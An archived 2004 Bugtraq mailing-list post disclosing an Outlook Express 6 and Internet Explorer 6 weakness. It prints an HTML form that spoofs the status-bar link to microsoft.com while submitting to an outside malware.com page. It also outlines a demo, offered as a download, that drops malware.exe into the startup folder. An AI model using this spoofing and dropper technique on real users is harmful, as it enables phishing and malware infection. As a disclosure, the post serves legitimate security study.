NOT GOOD: Outlook Express 6 + Internet Explorer 6

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: NOT GOOD: Outlook Express 6 + Internet Explorer 6
From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
Date: Wed, 31 Mar 2004 18:04:54 -0000
Cc: <NTBugtraq@xxxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: 1@xxxxxxxxxxx


Wednesday, March 31, 2004

This is somewhat disconcerting. Reference the recently disclosed 
Internet Explorer 'bug' presently in the wild [original 
discussion: http://www.securityfocus.com/archive/1/358813 with 
additional input buried thereunder in subsequent threads] 
allowing for complete remote compromise of the client machine 
without any user interaction other than viewing a webpage, 
through yet again, the Microsoft Internet Explorer browser. 

A lot of 'chatter' or very bold claims 'having been the first to 
see this and analyse it' seem to have appeared recently that 
would make this particular bug well known for at least 6 weeks 
now. We must assume that these claimants had immediately 
notified the manufacturer of this particular device that allows 
for all of this immediately back then. Accordingly 6 weeks have 
transpired and to date all users of this particular merchant's 
product remain vulnerable.

It still remains "unpatched". 

Perhaps to speed things up, the introduction of the Outlook 
Express email client from the same merchant might be necessary:

Commence:

Outlook Express number 6 has fairly stringent security settings 
in default mode, most notable, setting all actions in the so-
called 'restricted zone'. This disallows such things as frames, 
scripting, objects etc. 

However it does allow from one interesting piece of html

Forms:

<A
href="http://www.microsoft.com";>
<FORM action=http://www.malware.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: 
hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit 
value=http://www.microsoft.com>
</A>

What is of particular interest is that if we encase our html 
form with a run-of-the-mill 'link', we are able to spoof in our 
status bar our true destination:

[screen shot: http://www.malware.com/not-good.png 24KB]

as well as re-style our form to suit our needs.

What we then do is construct our original functional demo to:

a) redirect immediately on loading to the 'suggested' address; 
that is http://www.microsoft.com
b) at that instance [prior], drop our malware.exe into our 
startup folder for execution the next day

while the recipient is blissfully unaware viewing the site as 
indicated.

Fully Functional Harmless Demo:

http://www.malware.com/not-so-good.zip

note: regardless of where this is viewed, it is governed by 
the 'restricted zone' at all times

In this particular demo, we drop malware.exe into C: trivial 
tweaking via shell or full path places it wherever we like. This 
fully functional demo is heavily diluted. Practical 
implementation requires minor modifications on the 
transmitting client side. This demo will be flagged by AV suites 
owing to past usage and recognisable code.


End Call


-- 
http://www.malware.com

Prev by Date: [ GLSA 200403-10 ] Fetchmail 6.2.5 fixes a remote DoS
Next by Date: [RHSA-2004:137-01] Updated Ethereal packages fix security issues
Previous by thread: [ GLSA 200403-10 ] Fetchmail 6.2.5 fixes a remote DoS
Next by thread: [RHSA-2004:137-01] Updated Ethereal packages fix security issues
Index(es):
- Date
- Thread